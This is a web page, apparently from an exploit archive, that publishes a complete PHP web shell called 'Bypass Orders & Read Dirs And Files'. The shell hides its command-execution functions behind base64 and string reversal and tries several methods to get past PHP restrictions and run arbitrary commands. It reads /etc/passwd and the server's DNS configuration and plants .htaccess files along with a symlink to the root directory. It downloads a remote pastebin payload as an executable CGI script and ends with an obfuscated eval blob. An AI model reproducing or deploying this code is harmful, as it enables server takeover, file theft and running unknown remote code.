facebook facebook twitter rss

Bypass Orders & Read Dirs And Files v1.0

Author: jsass , Published: 24-06-2014
<html>
<head>
<center><title>Q8 GRAYHAT TEAM</title>
<body>
<H1 style="color: #123456; text-shadow: 0px 0px 1px #123456";text-align: center;> Bypass <s>Orders & Read </s> Dirs And Files v1.0</H1>
<PRE>



<?php

# Coded by jsass 
# Functions Bypass And many Another ways 
# Twitter : KwSecurity
# Q8 GRAYHAT TEAM

@set_time_limit(0);
 
error_reporting(0);


echo 
"<form method='POST' />
<input type='text'  name='cmd' size='22' /><input type='submit' name='cmx'  value='COMMAND' />
<form method='POST' />
<input type='text'  name='cf' size='60' /><br>
<input type='text'  name='cff' size='60' /><br>
<input type='submit'  value='Copy & Symlink' /><br>
<select name='switch'>
<option selected='selected' value='file'>View file</option><option value='dir'>View dir</option><input type='text' size='60' name='string'><input type='submit' value='go'>
</select>

<form method='POST' /> 
<select name='website'>
<option value='show_source'>show_source</option>
<option value='highlight_file'>highlight_file</option>
<option value='readfile'>readfile</option>
<option value='include'>include</option>
<option value='require'>require</option>
<option value='file'>file</option>
<option value='fread'>fread</option>
<option value='file_get_contents'>file_get_contents</option>
<option value='fgets'>fgets</option>
<option value='curl'>curl</option>
<input type='test' name='file' size='22' /><input type='submit' name='start'   value='READ FILES' />
</select>

<form method='POST' /> 
<select name='Bypass'>
<option value='passwd' >passwd</option>
<option value='users' >users</option>
<option value='Domain' >Domain</option>
<option value='htaccess' >htaccess</option>
<option value='Great_Cgi'>Great_Cgi</option>
<input type='submit' name='bypass'   value='bypass'></form>
</select>"
;

   function 
Command_execution($cmd)
    {  
//  Hmza Bypass Functions by strrev(base64_decode)

  
$sys strrev(base64_decode("bWV0U3lT"));//system 
  
$pas strrev(base64_decode("dXJodHNzYXA="));//passthru
  
$exe strrev(base64_decode("Y2V4ZQ=="));//exec 
  
$she strrev(base64_decode("Y2V4ZV9sbGVocw=="));//shell_exec 
  
$pop strrev(base64_decode("bmVwb3A="));//popen


  
$comand '';

  if (
function_exists('system')) { @ob_start();  @$sys($cmd);  $comand = @ob_get_contents();  @ob_end_clean();  }

  elseif (
function_exists('passthru')) {  @ob_start(); @$pas($cmd);   $comand = @ob_get_contents(); @ob_end_clean();  } 
  
  elseif (
function_exists('exec')) {  @$exe($cmd,$res);  $comand join("\n",$comand);  } 
    
  elseif (
function_exists('shell_exec')) {  @ob_start();  @$she($cmd);  $comand = @ob_get_contents();   @ob_end_clean(); } 
   
  elseif(
function_exists('popen')) {  $popen = @$pop($cmnd,"r");  }

    if ( 
is_resource($popen) ) {
    while ( !
feof($popen) ) { $comand .= fread($popen2096);  }
    
pclose($popen);
    } else { 
$z = array($sys,$pass,$exe,$she,$pop);
    foreach(
$z as $zz) {
    
$eval strrev(base64_decode(base64_decode(base64_decode(base64_decode('V1d0a1IwMXNjRkpRVkRBOQ==')))));//eval
    
$sy $zz ($_POST['site']);
    
$eval.$sy;
    break;}}
    return 
$comand;
}


function 
suhosin($cmd){
$sys strrev(base64_decode("bWV0U3lT"));//system 
$pas strrev(base64_decode("dXJodHNzYXA="));//passthru
$exe strrev(base64_decode("Y2V4ZQ=="));//exec 
$she strrev(base64_decode("Y2V4ZV9sbGVocw=="));//shell_exec 
$pop strrev(base64_decode("bmVwb3A="));//popen

$arcall = array($sys,$pas,$exe,$she,$pop);
foreach(
$arcall as $call) { 
$func call_user_func($call,$cmd); break;
if(!
$func$function = new ReflectionFunction($call); $function->invoke($cmd); break;
if(!
$function$calluser call_user_func_array($call, array($cmd)); break;
if(!
$calluser) declare(ticks=1); $register register_tick_function($call$cmd); unregister_tick_function($call); break;
if(!
$register$map array_map($call, array($cmd)); break;
if(!
$map$a = array($cmd); $walk array_walk($a,$call); break;
if(!
$walk$bfilter = array($cmd); $filter array_filter($bfilter$call); break;
}
return;
}


# Coded by برق الشمال
function ssys($cmd){
$s = array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
$C = array('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z');
$sy =  $C[18].$C[24].$C[18].$s[19].$C[4].$s[12];
$v $sy($cmd);
return 
$v;
break;
}

function 
copsy(){
  
$cf $_POST['cf'];
  
$cff $_POST['cff'];
  
mkdir(dirname($cff), 0777true);
  if (
copy($cf$cff)) { echo "$cff";
  }else{@
symlink($cf$cff);   echo "$cff"; } return;
}

## READ FILES

function readfils($file) {

    
$web $_POST['website'];

    switch (
$web)
    {
        case 
'show_source'$show =  @show_source($file);  break;

        case 
'highlight_file'$highlight = @highlight_file($file); break;

        case 
'readfile'$readfile = @readfile($file);  break;

        case 
'include'$include = @include($file); break;

        case 
'require'$require = @require($file);  break;

        case 
'file'$file =  @file($file);  foreach ($file as $key => $value) {  print $value; }  break;

        case 
'fread'$fopen = @fopen($file,"r") or die("Unable to open file!"); $fread = @fread($fopen,90000); fclose($fopen); print_r($fread); break;

        case 
'file_get_contents'$file_get_contents =  @file_get_contents($file); print_r($file_get_contents);  break;

        case 
'fgets'$fgets = @fopen($file,"r") or die("Unable to open file!"); while(!feof($fgets)) { echo fgets($fgets); } fclose($fgets); break;
        
        case 
'curl' $ch curl_init(); curl_setopt($chCURLOPT_URL"file:file:///".$file); curl_setopt($chCURLOPT_HEADER0); $curl curl_exec($ch); curl_close($ch); echo $curl;


        default: 
        echo 
"{$web} Not There"
      } 
      }
function 
red(){
  
$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;

if (
$string && $switch == "file") {
$stream imap_open($string"""");
if (
$stream == FALSE)
die(
"Can't open imap stream");

$str imap_body($stream1);
if (!empty(
$str))
echo 
"<pre>".$str."</pre>";
imap_close($stream);
} elseif (
$string && $switch == "dir") {
$stream imap_open("/etc/passwd""""");
if (
$stream == FALSE)
die(
"Can't open imap stream");

$string explode("|",$string);
if (
count($string) > 1)
$dir_list imap_list($streamtrim($string[0]), trim($string[1]));
else
$dir_list imap_list($streamtrim($string[0]), "*");
echo 
"<pre>";
for (
$i 0$i count($dir_list); $i++)
echo 
"$dir_list[$i]\n";
echo 
"</pre>";
imap_close($stream);
}
}

function 
passwd(){
$ch curl_init();
curl_setopt($chCURLOPT_URL"file:file:///etc/passwd");
curl_setopt($chCURLOPT_HEADER0);
$curl curl_exec($ch);
curl_close($ch);
echo 
$curl;

   if(!
$curl){
   for(
$uid=0;$uid<60000;$uid++){   //cat /etc/passwd
   
$ara posix_getpwuid($uid);
   if (!empty(
$ara)) {
   while (list (
$key$val) = each($ara)){
   echo  
"$val:";
   } } }

   return;
  }
}


function 
users(){
$ar = array("file_get_contents","file","readfile","include","require","show_source","highlight_file");
foreach(
$ar as $a){
$u explode("\n"$a("/etc/passwd"));
foreach (
$u as $us) {
$us explode (":"$us); 
print 
strip_tags($us[0]."\n"); }
if(!
$xx) : print_r($r."\n"); endif;
break;
}
}

function 
Domain(){
 
$ar = array("file_get_contents","file","readfile","include","require","show_source","highlight_file");
 foreach(
$ar as $a){
 
$file = @$a("/etc/named.conf");
 
preg_match_all("#named/(.*?).db#",$file ,$r);
 
$domains array_unique($r[1]);
 
$count count($domains);
 echo 
"Domains In Server is  :  ".$count;
 foreach(
$domains as $domain) { 
 print 
"\n$domain\n";  }break;}

  if(!isset(
$file)) {
 
$fopen = @fopen("/etc/named.conf","r") or die("Unable to open file!");
 
$fread = @fread($fopen,90000);
 
preg_match_all("#named/(.*?).db#",$fread ,$r); 
 
$domains array_unique($r[1]);
 
$count count($domains);
 echo 
"<p>Domains In Server is  :  ".$count."</p>";
 echo 
"<hr>";
 foreach(
$domains as $domain) {
 
fclose($fopen); 
 echo 
"<br>$domain<br>"; }}}


# GREAT 8
function htaccess(){
# This Code by c99.php
$map = array 
(
    
"secQ81" => "Options Indexes FollowSymLinks\nDirectoryIndex ssssss.htm\nAddType txt .php\nAddHandler txt .php\nAddType txt .html\nAddHandler txt .html\nOptions all\nOptions\nAllow from all\nRequire None\nSatisfy Any",
    
"secQ82" => "Options +FollowSymLinks\nDirectoryIndex seees.html\nRemoveHandler .php\nAddType application/octet-stream .php\n",
    
"secQ83" => "Options +FollowSymLinks\nDirectoryIndex Index.html\nOptions +Indexes\nAddType text/plain .php\nAddHandler server-parsed .php",
    
"secQ84" => "Options Indexes FollowSymLinks\nDirectoryIndex ssssss.htm\nAddType txt .php\nAddHandler txt .php",
    
"secQ85" => "Options all\nDirectoryIndex Sux.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html",
    
"secQ86" => "Options +FollowSymLinks\nDirectoryIndex Sux.html\nOptions +Indexes\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html",
    
"secQ87" => "Options Indexes FollowSymLinks\nAddType text/plain .php .inc .asp .php3\nOptions All\nOptions All",
    
"secQ88" => "Options all DirectoryIndex Sux.html AddType textplain .php AddType textplain .conf AddType textplain .sql AddType textplain .log AddHandler server-parsed .php AddHandler txt .html Require None Satisfy Any",
    
"secQ89" => "<Files *.php> ForceType application/x-httpd-php4</Files>"
);

foreach (
$map as $dir => $htaccess)
{
  
mkdir ($dir0755);
  
$file fopen ("$dir/.htaccess""a") or die("Unable to open file!");
  if (
fwrite ($file$htaccess)) 
  echo 
" Dir And File Created Succes ! - - ->".$dir."\n";
  else echo 
"WARNING";
  if(
file_exists($dir)){
  
chdir($dir);
  
system('ln -s / 1.txt');
  
chdir('../');
  }else{ echo 
"error";}}}

function 
Great_Cgi(){
  if(
function_exists('file_get_contents')){
  
mkdir("cgi"0777);
  
chdir('cgi');
  
$htazx  fopen(".htaccess""w") or die("Unable to open file!");
  
$fhtazx fwrite($htazx,"Options FollowSymLinks MultiViews Indexes ExecCGI 
    AddType application/x-httpd-cgi .Q8 
    AddHandler cgi-script .Q8 
    AddHandler cgi-script .Q8"
);
  
fclose($htazx);
  
$fx     fopen("js.Q8""w") or die("Unable to open file!");
  
$fgc    file_get_contents('http://pastebin.com/raw.php?i=CdZNmMut'); 
  
$fwr    fwrite($fx$fgc);
  
fclose($fx);
 
$chmchmod("js.Q8" 0755); 
  if(
$chm == true){
        echo 
"Created Succes ! and chmoded the file to 755 - - ->  cgi/js.Q8"; } chdir('../');}
  else{ echo 
"sorry file didn't chmoded"; }

}


############################## RUN FUNCTIONS ##############################

echo "<textarea rows='10' cols='80' />";

if(
$_POST['cmx']){
$cmd trim($_POST['cmd']);
$coman Command_execution($cmd);  
if(!
$coman)  $susu suhosin($cmd);  
if(!
$susussys($cmd);  
}

copsy();


red();


$file trim($_POST['file']);
if(
$_POST['start'])
     {
 
readfils($file); }


    if(isset(
$_POST['bypass'])) {
    switch (
$_POST['Bypass']) {
    case 
'passwd': print   passwd();      break;
    case 
'htaccess':       htaccess();    break;
    case 
'users':          users();       break;
    case 
'Domain':         Domain();      break;
    case 
'Great_Cgi':      Great_Cgi();   break;

    default:
      }
}

echo 
"</textarea>";

eval(
gzinflate(base64_decode('bVFPa4MwFD+v0O/wDIUobO0uO9XoeujKWGED15OIRI0YMCZoMujGvvuiaUthhQRe3u/f4yWOwlg1aj5jZSMBh0UUFv108dL2c9NRwfxgiaf2qojw+sKtZS+AlprLjiAEgulGVgQpOWgErCv1UTGChGk1V7TXq5H/UFFNEYyuBBnVSlqxHgGvrl7XGbxTRoNzqnnLzlJXD/zb1k+PKDoRHZhbK3QSDaYQXLsE1/+irbHAYYqzymmuKZPXPizyj/fkM8UjF2dACJyZEMDPfHZnSc+lVEd/kb+87rdJisdZcJZiLVQ+DoCze/gHOiCwHnBZtTOG5PCWbBPwPG9c8GX/a/i1cawd2A3NbrPb7G9L7Intr/4B')));

?>

<br>
<font color="#123456" size="3"><b> [ :: Copyright &copy 2014 - <font color="red"> by jsass </a> Q8 GRAYHAT Team</a> :: ] </b></font></font>
<br>
</PRE></CENTER></body>
</html>

Like us on Facebook :